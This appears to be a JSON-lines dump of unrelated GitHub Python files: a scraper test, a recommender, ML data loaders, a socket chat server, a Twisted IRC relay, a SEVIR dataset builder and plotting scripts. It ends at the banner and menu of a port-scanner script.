test_scrape_listing_urls(self):\n \"\"\"Test if the scrape_listing_urls method returns valid listing URLs.\"\"\"\n scraper = RemaxWebScraper()\n urls = scraper.scrape_listing_urls()\n \n # Check if the returned URLs are valid by verifying their format\n self.assertIsInstance(urls, list)\n self.assertTrue(all(url.startswith(\"https://remax.pt/\") for url in urls))\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"pedrotmatias/house_scrapping","sub_path":"house_scrapping/tests/test_remax_url_scapper.py","file_name":"test_remax_url_scapper.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8254817612","text":"import pandas as pd\r\nimport numpy as 
np\r\nimport movie_list as ml\r\n\r\n\r\ntitles = pd.read_csv('recom_title.csv')\r\ntitleids = pd.read_csv('recom_titleid.csv')\r\nsim_records = pd.read_csv('sim_record.csv')\r\n\r\nif __name__ == '__main__':\r\n    user_movie_list,idss = ml.getMovieList()\r\n    result = {}\r\n    for ids in idss:\r\n        recom_ids = titleids[titleids['title_id'] == ids].to_numpy().tolist()[0][1:]\r\n        #print(recom_ids)\r\n        sim_scores = sim_records[titleids['title_id'] == ids].to_numpy().tolist()[0][1:]\r\n        #print(recom_ids)\r\n        for i in range(15):\r\n            if recom_ids[i] in result:\r\n                result[recom_ids[i]] += sim_scores[i]\r\n            else:\r\n                result[recom_ids[i]] = sim_scores[i]\r\n    recom_list = sorted(list(result.keys()), key = lambda x: result[x], reverse = True)\r\n    recom_movies = [titles.loc[titleids['title_id'] == recom_id, 'title'].tolist()[0] for recom_id in recom_list]\r\n    for movie in recom_movies[:15]:\r\n        print(movie)\r\n","repo_name":"What-s-Our-Team-Name/CSE5914FinalProject","sub_path":"haidong/name_recommendations.py","file_name":"name_recommendations.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"41007555458","text":"# -*- coding: utf-8 -*-\n# -----------------------------------\n# @CreateTime : 2020/3/19 23:07\n# @Author : Mark Shawn\n# @Email : shawninjuly@gmail.com\n# ------------------------------------\nimport os\nimport logging\nimport random\nimport numpy as np\nfrom functools import partial\n\nfrom .common import lazy\n\n\nclass DataLoader:\n\tdef __init__(self, use_mp=True, shuffle=False, batch_size=256, split_ratio=0.9, seed=None):\n\t\tself.use_mp = use_mp\n\t\tself.shuffle = shuffle\n\t\tself.batch_size = batch_size\n\n\t\tself.split_ratio = split_ratio\n\t\tassert 0 <= split_ratio <= 1, \"the train/validation split ratio must be between 0 and 1!\"\n\n\t\tself.seed = seed\n\t\tnp.random.seed(self.seed)\n\n\tdef _load_from_file(self, file_path, dtype=float):\n\t\tassert os.path.exists(file_path), \"target file does not exist: {}\".format(os.path.abspath(file_path))\n\t\twith open(file_path, \"r\") as fp:\n\t\t\tlines = fp.readlines()\n\t\t\tif self.use_mp:\n\t\t\t\timport multiprocessing as mp\n\t\t\t\twith mp.Pool() as p:\n\t\t\t\t\tdata = np.array(p.map(partial(self._load_line, dtype=dtype), lines))\n\t\t\telse:\n\t\t\t\tdata = np.array(list(map(partial(self._load_line, dtype=dtype), lines)))\n\t\tlogging.info(\"Loaded data with shape {} from {}\".format(data.shape, os.path.abspath(file_path)))\n\t\treturn data\n\n\tdef load_X(self, file_path):\n\t\tself.X = self._load_from_file(file_path, dtype=float)\n\t\tself.N_items, self.N_features = self.X.shape\n\n\tdef load_Y(self, file_path):\n\t\tself.Y = self._load_from_file(file_path, dtype=int).flatten()\n\n\tdef load_XY(self, file_path):\n\t\tdata = self._load_from_file(file_path, dtype=float)\n\t\tself.X = data[:, :-1]\n\t\tself.N_items, self.N_features = self.X.shape\n\t\tself.Y = data[:, -1].astype(int)\n\n\t@lazy\n\tdef data(self):\n\t\t_data = np.hstack([self.X, self.Y.reshape(-1, 1)])\n\t\treturn _data\n\n\t@lazy\n\tdef X_to_valid(self):\n\t\treturn self.X[int(self.N_items * self.split_ratio):]\n\n\t@lazy\n\tdef Y_to_valid(self):\n\t\treturn self.Y[int(self.N_items * self.split_ratio):]\n\n\t@lazy\n\tdef N_to_train(self):\n\t\treturn int(self.N_items * self.split_ratio)\n\n\t@lazy\n\tdef _train_slice(self) -> list:\n\t\t\"\"\"\n\t\tUse array indices to control shuffling;\n\t\tthis should be more efficient than shuffling the training data directly\n\n\t\t:return: a list of indices that excludes the validation part\n\t\t\"\"\"\n\t\tidx = list(range(self.N_items))\n\t\tif 
self.shuffle:\n\t\t\trandom.shuffle(idx)\n\t\treturn idx[: self.N_to_train]\n\n\t@staticmethod\n\tdef _load_line(line, delimiter=\",\", dtype=float):\n\t\treturn np.array(line.split(delimiter), dtype=dtype)\n\n\tdef __iter__(self):\n\t\tfor i in range(0, self.N_to_train, self.batch_size):\n\t\t\tyield self.X[self._train_slice[i: i + self.batch_size]], \\\n\t\t\t      self.Y[self._train_slice[i: i + self.batch_size]]\n\n\tdef __len__(self):\n\t\treturn np.ceil(self.N_to_train / self.batch_size).astype(int).item()\n","repo_name":"winterf97/MachineLarning_Numpy_CodeCraft2020","sub_path":"core/dataloaders.py","file_name":"dataloaders.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"}
+{"seq_id":"35659214064","text":"# import socket programming library \nimport socket \nimport struct \nfrom _thread import *\nimport threading \n\nprint_lock = threading.Lock() \n\n# thread function \ndef threaded_receive(c): \n\twhile True: \n\n\t\t# data received from client \n\t\tdata = c.recv(1024) \n\t\tif not data: \n\t\t\tprint('Bye') \n\t\t\t# lock released on exit \n\t\t\tprint_lock.release() \n\t\t\tbreak\n\t\tdata = data[2:]\n\t\tprint(\"\\nUser: \" + data.decode()) \n\n\t# connection closed \n\tc.close() \n\n\ndef threaded_send(c):\n\twhile True:\n\t\tmsg = input(\"\\n\")\n\t\tif msg == \"\":  # input() strips the newline, so test for an empty message\n\t\t\tprint(\"ERROR\")\n\t\t\tbreak\n\t\t# msg = msg + \"\\n\"\n\t\tmsg = msg.encode(\"utf-8\", 'ignore')\n\t\tc.send(struct.pack(\"!H\", len(msg)))\n\t\tc.send(msg)\n\tc.close()\n\n\ndef Main(): \n\thost = \"10.147.148.105\" \n\n\t# reserve a port on your computer \n\t# in our case it is 12345 but it \n\t# can be anything \n\tport = int(input(\"Port ?\"))\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n\ts.bind((host, port)) \n\tprint(\"socket bound to port\", port) \n\n\t# put the socket into listening mode \n\ts.listen(5) \n\tprint(\"socket is listening\") \n\n\t# a forever loop until client wants to exit \n\twhile True: \n\n\t\t# establish connection with client \n\t\tc, addr = s.accept() \n\n\t\t# lock acquired by client \n\t\tprint('Connected to :', addr[0], ':', addr[1]) \n\n\t\tprint_lock.acquire() \n\n\t\t# Start a new thread and return its identifier\n\t\tstart_new_thread(threaded_send,(c,))\n\t\tstart_new_thread(threaded_receive, (c,))\n\ts.close()\n\nif __name__ == '__main__': \n\tMain() \n","repo_name":"RKJenamani/J.A.R.V.I.C.","sub_path":"Front_end/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
+{"seq_id":"70818345106","text":"from datasets import Dataset\nfrom loguru import logger\n\n\ndef preprocess_squad_format(dataset: Dataset) -> Dataset:\n    \"\"\"Preprocesses a dataset in SQuAD format (nested answers) to a dataset in SQuAD format that has flat answers.\n    {\"answer\": {\"text\": \"answer\", \"start\": 0}} -> {\"text\": \"answer\"}\n\n    Args:\n        dataset (Dataset): A huggingface dataset in SQuAD format.\n\n    Returns:\n        Dataset: A huggingface dataset in SQuAD format with flat answers.\n    \"\"\"\n\n    def preprocess(example):\n        if example[\"answers\"]:\n            example[\"answers\"] = example[\"answers\"].pop()\n        else:\n            example[\"answers\"] = \"\"\n        return example\n\n    dataset = dataset.flatten().rename_column(\"answers.text\", \"answers\").map(preprocess)\n    return dataset\n\n\ndef postprocess_squad_format(dataset: Dataset, add_answer_start: bool = True) -> Dataset:\n    \"\"\"Postprocesses a dataset 
in SQuAD format (flat answers) to a dataset in SQuAD format that has nested answers.\n {\"text\": \"answer\"} -> {\"answer\": {\"text\": \"answer\", \"start\": 0}}\n\n Args:\n dataset (Dataset): A huggingface dataset in SQuAD format.\n add_answer_start (bool, optional): Whether to add the answer start index to the dataset. Defaults to True.\n\n Returns:\n Dataset: A huggingface dataset in SQuAD format with nested answers.\n \"\"\"\n # remove punctuation and whitespace from the start and end of the answer\n def remove_punctuation(example):\n example[\"answers\"] = example[\"answers\"].strip(\".,;!? \")\n return example\n\n dataset = dataset.map(remove_punctuation)\n\n if add_answer_start:\n dataset = dataset.map(calculate_answer_start)\n\n def unify_answers(example):\n is_answerable = \"answer_start\" in example\n if is_answerable:\n example[\"answers\"] = {\"text\": [example[\"answers\"]], \"answer_start\": [example[\"answer_start\"]]}\n else:\n example[\"answers\"] = {\"text\": [], \"answer_start\": []}\n return example\n\n dataset = dataset.map(unify_answers)\n if \"answer_start\" in dataset.column_names:\n dataset = dataset.remove_columns(\"answer_start\")\n return dataset\n\n\ndef calculate_answer_start(example):\n \"\"\"Calculates the answer start index for a SQuAD example.\n\n Args:\n example (Dict): A SQuAD example.\n\n Returns:\n Dict: The SQuAD example with the answer start index added.\n \"\"\"\n answer_start = example[\"context\"].lower().find(example[\"answers\"].lower())\n if answer_start < 0:\n logger.info(\n 'Could not calculate the answer start because the context \"{}\" ' 'does not contain the answer \"{}\".',\n example[\"context\"],\n example[\"answers\"],\n )\n answer_start = -1\n else:\n # check that the answer doesn't occur more than once in the context\n second_answer_start = example[\"context\"].lower().find(example[\"answers\"].lower(), answer_start + 1)\n if second_answer_start >= 0:\n logger.info(\"Could not calculate the answer start because the context contains the answer more than once.\")\n answer_start = -1\n else:\n # correct potential wrong capitalization of the answer compared to the context\n example[\"answers\"] = example[\"context\"][answer_start : answer_start + len(example[\"answers\"])]\n example[\"answer_start\"] = answer_start\n return example\n","repo_name":"flairNLP/fabricator","sub_path":"src/fabricator/dataset_transformations/question_answering.py","file_name":"question_answering.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"48"} +{"seq_id":"2444003286","text":"__author__ = \"Andrew Seitz\"\n\"\"\"\nMain iirc event loop. 
Hosts the relay and is responsible for launching irc modules.\n\"\"\"\n\nimport sys\n\nfrom twisted.internet import protocol, reactor\nfrom twisted.internet.endpoints import TCP4ServerEndpoint\nfrom twisted.internet.protocol import Factory\nfrom twisted.protocols import amp\nfrom twisted.protocols.basic import LineReceiver\nfrom twisted.python import log\n\nimport commands\nimport ircclient\n\n\nclass SupCommand(amp.Command):\n    pass\n\n\nclass AMPProtocol(amp.AMP):\n    \"\"\"Needs reference to own factory\"\"\"\n\n    def __init__(self):\n        self.ampFactory = None\n\n    @commands.SupCommand.responder\n    def sup(self):\n        log.msg('got sup')\n        return {}\n\n    @commands.IRCSendRelayMSGLine.responder\n    def cmdIRCSendRelayMSGLine(self, server, channel, user, message):\n        user = user.split('!', 1)[0]\n\n        line = 'msg {0} {1} {2} {3}'.format(server, channel, user, message)\n        self.ampFactory.getRelay().sendLine(line)\n        return {}\n\n    @commands.IRCSendRelayInfoLine.responder\n    def cmdIRCSendRelayInfoLine(self, message):\n        self.ampFactory.getRelay().sendLine(message)\n        return {}\n\n    def connectionMade(self):\n        self.ampFactory.setAMP(self)\n        log.msg('Connection with amp server made, proto: ', self.ampFactory.getAMP())\n\n    def connectionLost(self, reason):\n        log.msg('AMP client disconnected')\n        # tear everything down\n\n\nclass AMPFactory(protocol.ServerFactory):\n    protocol = AMPProtocol\n\n    \"\"\"Needs a reference to its current AMP and the Relay factory\"\"\"\n\n    def __init__(self):\n        self.amp = None\n        self.relayFactory = None\n\n    def buildProtocol(self, addr):\n        self.amp = AMPProtocol()\n        self.amp.ampFactory = self\n        log.msg('AMP client spawned')\n        return self.amp\n\n    def getAMP(self):\n        return self.amp\n\n    def setAMP(self, ap):\n        self.amp = ap\n\n    def getRelay(self):\n        return self.relayFactory.getRelay()\n\n    def setRelayFactory(self, rf):\n        self.relayFactory = rf\n\n    def getRelayFactory(self):\n        return self.relayFactory\n\n\nclass RelayProtocol(LineReceiver):\n    def __init__(self):\n        # self.relayFactory = rf\n        # self.relayFactory.setRelay(self)\n        self.relayFactory = None\n\n    \"\"\"Wants a reference to its factory\"\"\"\n\n    def connectionMade(self):\n        self.relayFactory.setRelay(self)\n        self.sendLine('Welcome to iirc')\n        self.sendLine('Type \\'connect <server> <nickname> <port>\\' to join a server')\n\n    def connectionLost(self, reason):\n        log.msg('Relay server lost connection with client: ', reason)\n\n    def lineReceived(self, line):\n        # When a line is received from the client\n        cmd = line.split(' ', 1)\n        if cmd[0] == 'cmd':\n            log.msg('Command received: ', cmd[1])\n\n        elif cmd[0] == 'connect':\n            # Syntax: connect <server> <nickname> <port>\n            args = cmd[1].split(' ', 2)\n            server = args[0]\n            nickname = args[1]\n            port = int(args[2])\n            log.msg('Connecting to server: ' + args[0])\n            # Launch the irc client module here\n            ircclient.launchIRC(server, nickname, port)\n\n        elif cmd[0] == 'sendLine':\n            # Send a line to the irc server and channel\n            # sendLine <server> <channel> <user> <message>\n            args = cmd[1].split(' ', 3)\n            d = self.relayFactory.getAMP().callRemote(\n                commands.IRCSendLine,\n                server=args[0],\n                channel=args[1],\n                message=args[3])\n            d.addCallback(lambda l: log.msg('sendLine sent line: ', cmd[1]))\n\n        elif cmd[0] == 'join':\n            # TODO: Add the server identifier, then make the responder handle it\n            # Tell the irc client to join a new channel\n            args = cmd[1].split(' ', 2)\n            log.msg('Join command: ', args)\n            d = self.relayFactory.getAMP().callRemote(\n                commands.IRCJoinChannel,\n                server=args[0],\n                channel=args[1])\n            d.addCallback(lambda l: log.msg('Join channel ', args))\n\n        elif cmd[0] == 'part':\n            # Tell 
the irc client to leave a channel\n args = cmd[1].split(' ')\n argLength = len(args)\n if argLength == 1:\n reason = ''\n else:\n reason = args[1]\n\n if argLength < 2:\n self.relayFactory.getAMP().callRemote(\n commands.IRCLeaveChannel,\n channel=args[0],\n reason=reason)\n else:\n self.sendLine('Error: bad command: ' + cmd[0] + ' ' + cmd[1])\n\n elif cmd[0] == 'disconnect':\n # Kill the irc module\n log.msg('disconnect received')\n\n else:\n log.msg(cmd)\n\n\nclass RelayFactory(Factory):\n protocol = RelayProtocol\n\n def __init__(self):\n \"\"\"Needs reference to current Relay and the AMP Factory\"\"\"\n self.relay = None\n self.ampFactory = None\n\n # def sendAMP(self, arg):\n # self.ampFactory.amp.callRemote(arg)\n\n def getRelay(self):\n return self.relay\n\n def setRelay(self, rl):\n self.relay = rl\n\n def getAMP(self):\n return self.ampFactory.getAMP()\n\n def setAMPFactory(self, af):\n self.ampFactory = af\n\n def getAMPFactory(self):\n return self.ampFactory\n\n def startedConnecting(self, connector):\n log.msg('Main server line receiver connecting...')\n\n def buildProtocol(self, addr):\n log.msg('Main server line receiver connected!')\n self.relay = RelayProtocol()\n self.relay.relayFactory = self\n return self.relay\n\n\ndef startIIRC():\n log.startLogging(sys.stdout)\n\n \"\"\"Start the AMP server\"\"\"\n amppoint = TCP4ServerEndpoint(reactor, 9992)\n ampfactory = AMPFactory()\n amppoint.listen(ampfactory)\n\n log.msg(\"AMP server started\")\n\n \"\"\"Start the Relay server\"\"\"\n relaypoint = TCP4ServerEndpoint(reactor, 9993)\n relayfactory = RelayFactory()\n relaypoint.listen(relayfactory)\n\n relayfactory.setAMPFactory(ampfactory)\n ampfactory.setRelayFactory(relayfactory)\n\n log.msg('relayFactory.ampFactory: ', relayfactory.getAMPFactory())\n log.msg('ampFactory.relayFactory: ', ampfactory.getRelayFactory())\n\n # log.msg('relayFactory reference to amp: ', relayFactory.getAMP())\n # log.msg('ampFactory reference to relay: ', ampFactory.getRelay())\n\n # reactor.run()","repo_name":"StolenToast/IIRC","sub_path":"iirc.py","file_name":"iirc.py","file_ext":"py","file_size_in_byte":6528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2149144318","text":"\"\"\"\nMakes training and test dataset for radar nowcasting model\n\"\"\"\n\nimport sys\nsys.path.append('..') # add src to path\nimport argparse\nimport logging\nimport datetime\n\nimport os\nimport h5py\nos.environ[\"HDF5_USE_FILE_LOCKING\"]='FALSE'\n\nimport sys\nimport numpy as np\nimport pandas as pd\n\nfrom src.generator import SEVIRGenerator\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Make nowcast training & test datasets using SEVIR')\n parser.add_argument('--input_types', nargs='+', type=str, help='list of input SEVIR modalities', default=['vil'])\n parser.add_argument('--output_types', nargs='+', type=str, help='list of output SEVIR modalities', default=['vil'])\n parser.add_argument('--sevir_data', type=str, help='location of SEVIR dataset',default='../../data/sevir')\n parser.add_argument('--sevir_catalog', type=str, help='location of SEVIR dataset',default='../../data/CATALOG.csv')\n parser.add_argument('--output_location', type=str, help='location of SEVIR dataset',default='../../data/processeed')\n parser.add_argument('--n_train',type=int,help='Maximum number of samples to use for training (None=all)',default=None)\n parser.add_argument('--n_test',type=int,help='Maximum number of samples to use for testing 
(None=all)',default=None)\n    parser.add_argument('--n_chunks', type=int, help='Number of chunks to use (increase if memory limited)',default=8)\n    parser.add_argument('--split_date', type=str, help='Day (yymmdd) to split train and test',default='190601')\n    parser.add_argument('--append',action='store_true',help='Write chunks into one single file instead of individual files')\n    parser.add_argument('--shuffle',action='store_true',help='Shuffle dataset before writing to h5 files')\n    \n    args = parser.parse_args()\n    return args\n\n\ndef main(args):\n    \"\"\" \n    Runs data processing scripts to extract training set from SEVIR\n    \"\"\"\n    logger = logging.getLogger(__name__)\n    logger.info('making nowcasting data set from raw data')\n    split_date = datetime.datetime.strptime(args.split_date,'%y%m%d')\n\n    trn_generator = get_nowcast_train_generator(sevir_catalog=args.sevir_catalog,\n                                                sevir_location=args.sevir_data,\n                                                x_types=args.input_types,\n                                                y_types=args.output_types,\n                                                end_date=split_date,\n                                                shuffle=args.shuffle)\n    tst_generator = get_nowcast_test_generator(sevir_catalog=args.sevir_catalog,\n                                               sevir_location=args.sevir_data,\n                                               x_types=args.input_types,\n                                               y_types=args.output_types,\n                                               start_date=split_date,\n                                               shuffle=args.shuffle)\n    \n    logger.info('Reading/writing training data to %s' % ('%s/nowcast_training.h5' % args.output_location))\n    read_write_chunks('%s/nowcast_training.h5' % args.output_location,trn_generator,args.n_chunks,\n                      args.input_types, args.output_types,append=args.append)\n    logger.info('Reading/writing testing data to %s' % ('%s/nowcast_testing.h5' % args.output_location))\n    read_write_chunks('%s/nowcast_testing.h5' % args.output_location,tst_generator,args.n_chunks,\n                      args.input_types, args.output_types,append=args.append)\n\n\ndef read_write_chunks( out_filename, generator, n_chunks, input_types, output_types, append=False ):\n    logger = logging.getLogger(__name__)\n    chunksize = len(generator)//n_chunks\n    # get first chunk\n    logger.info('Gathering chunk 0/%s:' % n_chunks)\n    (X,Y),meta=generator.load_batches(n_batches=chunksize,offset=0,progress_bar=True,return_meta=True)\n\n    # Create datasets\n    fn,ext=os.path.splitext(out_filename)\n    cs = '' if append else '_000'\n    filename=fn+cs+ext\n    for i,x in enumerate(X):\n        with h5py.File(filename, 'w' if i==0 else 'a') as hf:\n            
hf.create_dataset('IN_%s' % input_types[i], data=x, maxshape=(None,x.shape[1],x.shape[2],x.shape[3]))\n for i,y in enumerate(Y):\n with h5py.File(filename, 'a') as hf:\n hf.create_dataset('OUT_%s' % output_types[i], data=y, maxshape=(None,y.shape[1],y.shape[2],y.shape[3]))\n metac.to_csv(fn+cs+'_META.csv')\n if append:\n meta.to_csv(fn+cs+'_META.csv')\n\n\nclass NowcastGenerator(SEVIRGenerator):\n \"\"\"\n Generator that loads full VIL sequences, and spilts each\n event into three training samples, each 12 frames long.\n\n Event Frames: [-----------------------------------------------]\n [----13-----][---12----]\n [----13----][----12----]\n [-----13----][----12----]\n \"\"\"\n def get_batch(self, idx,return_meta=False):\n \"\"\"\n Splits batch into three hour-long past/future sequences\n \"\"\"\n (X,_),meta = super(NowcastGenerator, self).get_batch(idx,return_meta=True) # N,L,W,49\n x_out,y_out=[],[]\n for t in range(len(X)):\n x1,x2,x3 = X[t][:,:,:,:13],X[t][:,:,:,12:25],X[t][:,:,:,24:37]\n y1,y2,y3 = X[t][:,:,:,13:25],X[t][:,:,:,25:37],X[t][:,:,:,37:49]\n Xnew = np.concatenate((x1,x2,x3),axis=0)\n Ynew = np.concatenate((y1,y2,y3),axis=0)\n x_out.append(Xnew)\n if self.x_img_types[t] in self.y_img_types:\n y_out.append(Ynew)\n if return_meta:\n return (x_out,y_out),meta\n else:\n return x_out,y_out\n \n def get_batch_metadata(self,idx):\n \"\"\"\n Duplicates meta three times and adjusts time stamps\n \"\"\"\n meta = super(NowcastGenerator, self).get_batch_metadata(idx)\n meta['minute_offsets']=':'.join([str(n) for n in range(-60,65,5)])\n meta1,meta2,meta3=meta.copy(),meta.copy(),meta.copy()\n meta1['time_utc'] = meta['time_utc'] - pd.Timedelta(hours=1)\n meta3['time_utc'] = meta['time_utc'] + pd.Timedelta(hours=1)\n return pd.concat((meta1,meta2,meta3))\n \n \ndef get_nowcast_train_generator(sevir_catalog,\n sevir_location,\n x_types=['vil'],\n y_types=['vil'],\n batch_size=8,\n start_date=None,\n end_date=datetime.datetime(2019,6,1),\n **kwargs):\n filt = lambda c: c.pct_missing==0 # remove samples with missing radar data\n return NowcastGenerator(catalog=sevir_catalog,\n sevir_data_home=sevir_location,\n x_img_types=x_types,\n y_img_types=y_types,\n batch_size=batch_size,\n start_date=start_date,\n end_date=end_date,\n catalog_filter=filt,\n **kwargs)\n\ndef get_nowcast_test_generator(sevir_catalog,\n sevir_location,\n x_types=['vil'],\n y_types=['vil'],\n batch_size=8,\n start_date=datetime.datetime(2019,6,1),\n end_date=None,\n **kwargs):\n filt = lambda c: c.pct_missing==0 # remove samples with missing radar data\n return NowcastGenerator(catalog=sevir_catalog,\n sevir_data_home=sevir_location,\n x_img_types=x_types,\n y_img_types=y_types,\n batch_size=batch_size,\n start_date=start_date,\n end_date=end_date,\n catalog_filter=filt,\n **kwargs)\n\n\nif __name__ == '__main__':\n log_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n logging.basicConfig(level=logging.INFO, format=log_fmt)\n args=parse_args()\n main(args)\n","repo_name":"MIT-AI-Accelerator/sevir_challenges","sub_path":"radar_nowcasting/make_dataset.py","file_name":"make_dataset.py","file_ext":"py","file_size_in_byte":9646,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"48"} +{"seq_id":"36418471945","text":"import click\nfrom chakin.cli import pass_context, json_loads\nfrom chakin.decorators import custom_exception, dict_output\n\n\n@click.command('add_biomaterial')\n@click.argument(\"biomaterial_name\", type=str)\n@click.argument(\"organism_id\", 
type=int)\n@click.option(\n \"--description\",\n help=\"Description of the biomaterial\",\n type=str\n)\n@click.option(\n \"--biomaterial_provider\",\n help=\"Biomaterial provider name\",\n type=str\n)\n@click.option(\n \"--biosample_accession\",\n help=\"Biosample accession number\",\n type=str\n)\n@click.option(\n \"--sra_accession\",\n help=\"SRA accession number\",\n type=str\n)\n@click.option(\n \"--bioproject_accession\",\n help=\"Bioproject accession number\",\n type=str\n)\n@click.option(\n \"--attributes\",\n help=\"Custom attributes (In JSON dict form)\",\n type=str\n)\n@pass_context\n@custom_exception\n@dict_output\ndef cli(ctx, biomaterial_name, organism_id, description=\"\", biomaterial_provider=\"\", biosample_accession=\"\", sra_accession=\"\", bioproject_accession=\"\", attributes={}):\n \"\"\"Add a new biomaterial to the database\n\nOutput:\n\n Biomaterial details\n \"\"\"\n return ctx.gi.expression.add_biomaterial(biomaterial_name, organism_id, description=description, biomaterial_provider=biomaterial_provider, biosample_accession=biosample_accession, sra_accession=sra_accession, bioproject_accession=bioproject_accession, attributes=attributes)\n","repo_name":"galaxy-genome-annotation/python-chado","sub_path":"chakin/commands/expression/add_biomaterial.py","file_name":"add_biomaterial.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"31362853815","text":"import pytest\nfrom aiogtts.tokenizer.pre_processors import tone_marks, end_of_line, abbreviations, word_sub\n\n\ndef test_tone_marks():\n _in = 'lorem!ipsum?'\n _out = 'lorem! ipsum? '\n assert tone_marks(_in) == _out\n\n\ndef test_end_of_line():\n _in = '''test-\ning'''\n _out = 'testing'\n assert end_of_line(_in) == _out\n\n\ndef test_abbreviations():\n _in = 'jr. sr. dr.'\n _out = 'jr sr dr'\n assert abbreviations(_in) == _out\n\n\ndef test_word_sub():\n _in = 'Esq. 
Bacon'\n _out = 'Esquire Bacon'\n assert word_sub(_in) == _out\n\n\nif __name__ == '__main__':\n pytest.main(['-x', __file__])\n","repo_name":"Helow19274/aiogTTS","sub_path":"tests/test_tokenizer_pre_processors.py","file_name":"test_tokenizer_pre_processors.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"14896637516","text":"import os,sys,time\nimport numpy as np\nimport matplotlib\nfrom matplotlib import pyplot as plt\nfrom scipy.signal import savgol_filter\n# plot to compare optimizers\n# 30 tf.train.GradientDescentOptimizer (with scheduler)\n# 32 tf.train.AdamOptimizer\n# 34 tf.train.RMSPropOptimizer\n# 36 tf.train.AdadeltaOptimizer\n# 38 tf.train.GradientDescentOptimizer\n\n\ndb_root = \"/home/maksym/Desktop/slt_titan\"\nout_path = \"/home/maksym/Desktop/9520_final/plots\"\n#folders = [\"cfg4_30\",\"cfg4_31\",\"cfg4_32\",\"cfg4_33\",\"cfg4_34\",\"cfg4_35\",\"cfg4_36\",\"cfg4_37\",\"cfg4_38\",\"cfg4_39\"]\nfolders= [\"cfg4_29\",\"cfg4_30\",\"cfg4_31\"]\n\n#from os import listdir\n#from os.path import isfile, join\n\n\nruns_means = []\nruns_filts = []\nfor folder_name in folders:\n folder = os.path.join(db_root, folder_name)\n runfiles = [f for f in os.listdir(folder) if os.path.isfile(os.path.join(folder, f))]\n runs_data = []\n for runfile in runfiles:\n run_data = np.loadtxt(os.path.join(folder,runfile))\n runs_data.append(run_data)\n # work on data\n runs_data = np.asarray(runs_data)\n runs_mean = np.mean(runs_data,axis=0)\n runs_filt = savgol_filter(runs_mean,101,4)\n runs_means.append(runs_mean)\n runs_filts.append(runs_filt)\n\n\n\nX = np.arange(0,25000) * 0.001\n\nfig = plt.figure()\nmatplotlib.rcParams.update({'font.size': 18})\nfig.set_size_inches(12.8, 12.8)\nax = fig.gca(yscale=\"log\")\nax.set_xlabel(\"Epoch\")\nax.set_ylabel(\"Loss\")\n\n\n\n# plot SGD\nplt.plot(X,runs_filts[0]) # color='c', alpha=0.3\nplt.plot(X,runs_filts[1][:25000])\n# plot ADAM\nplt.plot(X,runs_filts[2][:25000])\n\n\nax.legend([\"SGD-1x256\",\"SGD-64x256\",\"SGD-256x256\"])#,prop={'size': 12})\nplt.savefig(os.path.join(out_path, \"optimizers2.png\"))\nplt.close()\n\n\n\n# # plot SGD\n# plt.plot(X,runs_filts[8],color=\"C0\") # color='c', alpha=0.3\n# plt.plot(X,runs_filts[9],color=\"C0\",alpha=0.5)\n# # plot ADAM\n# plt.plot(X,runs_filts[2],color=\"C1\")\n# plt.plot(X,runs_filts[3],color=\"C1\",alpha=0.5)\n# # plot RMSprop\n# plt.plot(X,runs_filts[4],color=\"C2\")\n# plt.plot(X,runs_filts[5],color=\"C2\",alpha=0.5)\n# # plot AdaDelta\n# plt.plot(X,runs_filts[6],color=\"C3\")\n# plt.plot(X,runs_filts[7],color=\"C3\",alpha=0.5)\n#\n# ax.legend([\"SGD\",\"Pranam-SGD\",\"Adam\",\"Pranam-Adam\",\"RMSProp\",\"Pranam-RMSProp\",\"AdaDelta\",\"Pranam-AdaDelta\"])#,prop={'size': 12})\n# plt.savefig(os.path.join(out_path, \"optimizers.png\"))\n# plt.close()","repo_name":"MKorablyov/9520_final","sub_path":"temp_optplot.py","file_name":"temp_optplot.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73524535187","text":"import socket # siteye bağlanmamız için \"socket\" modülünü çağırıyoruz\nprint(\"\"\"\n\n\n _______ ___ _ ___ _ _ _____ \n | ____\\ \\/ / \\ | |_ _| \\ | | ____|\n | _| \\ /| \\| || || \\| | _| \n | |___ / \\| |\\ || || |\\ | |___ \n |_____/_/\\_\\_| \\_|___|_| \\_|_____|\n\n\n\"\"\")\nprint(\"\"\"\n(1) Port Checker\n(2) Port Scanner \n(3) Exit\n\"\"\") #\"socket.SOCK_STREAM\" ise sunucu ile 
